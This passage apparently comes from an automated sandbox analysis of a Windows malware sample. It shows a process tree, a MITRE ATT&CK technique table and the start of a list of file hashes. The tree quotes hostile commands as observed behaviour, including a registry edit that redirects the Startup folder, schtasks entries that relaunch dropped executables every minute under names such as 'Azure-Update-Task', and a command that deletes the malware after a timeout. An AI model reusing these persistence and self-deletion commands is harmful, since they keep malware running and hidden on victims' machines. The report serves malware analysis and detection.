                                                                                                                                                                      PID:8788
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\m3pbk5kk.4ou\anyname.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\m3pbk5kk.4ou\anyname.exe" -q
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:808
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ba4xtmgd.ihj\gcleaner.exe /mixfive & exit
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:8208
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ba4xtmgd.ihj\gcleaner.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ba4xtmgd.ihj\gcleaner.exe /mixfive
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:8956
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\do1ryfjs.xxt\autosubplayer.exe /S & exit
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:9552
                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      PID:2676
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:5052
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:7080
                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        PID:7440
                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 7EC8387CF616FC19E237F84BBC2EB7FE C
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:8084
                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding B25EA6E4A62B678C7FE3704F64274424 C
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:5516
                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 8A8FB4FD3ECA8CBFA748F2DC43F2FB04
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:488
                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 61E651B5987AD28CE8A458913309A864 C
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:9104
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:9004
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:10096
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:8840
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1c8,0x1c4,0x1c0,0x1fc,0x1bc,0x7ff8498bdec0,0x7ff8498bded0,0x7ff8498bdee0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:3424
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:7580
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --mojo-platform-channel-handle=1708 /prefetch:8
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:6564
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --mojo-platform-channel-handle=2072 /prefetch:8
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5016
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2400 /prefetch:1
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:7452
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2724 /prefetch:1
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:7884
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3132 /prefetch:2
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:8564
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --mojo-platform-channel-handle=2016 /prefetch:8
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:8700
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --mojo-platform-channel-handle=2620 /prefetch:8
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:7484
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --mojo-platform-channel-handle=2516 /prefetch:8
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:5752
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --mojo-platform-channel-handle=3600 /prefetch:8
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:9712
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,13022009104678878398,11779961300458792454,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8840_2146646226" --mojo-platform-channel-handle=2644 /prefetch:8
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:1028
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_2BC0.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:8968
                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        PID:772
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          PID:7704
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                        PID:6072
                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                        PID:4888
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                        PID:8940
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        PID:6320
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:6936
                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5620
                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                              DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{77a4a643-2e5a-7b4f-92e0-994f19da5879}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:8804
                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:7824
                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                PID:9184
                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5872
                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:9168
                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:5976
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:8300
                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:7344
                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                            MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:9244
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\B2EC.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\B2EC.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:10212
                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:8504
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CCCE.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\CCCE.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:5648
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:7156
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:9516
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:8568
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:9956
                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:5116
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\340.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\340.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4556
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\AoOZ7D0k0M.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\AoOZ7D0k0M.exe"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4372
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                  PID:8488
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\340.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:8680
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                    timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                    PID:9192
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\J0dKUiT7h4.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\J0dKUiT7h4.exe"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:6908
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                      PID:4276
                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:3080
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:8672
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:8656

                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                      4
                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                      7
                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                      7
                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1018

                                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                        SHA256

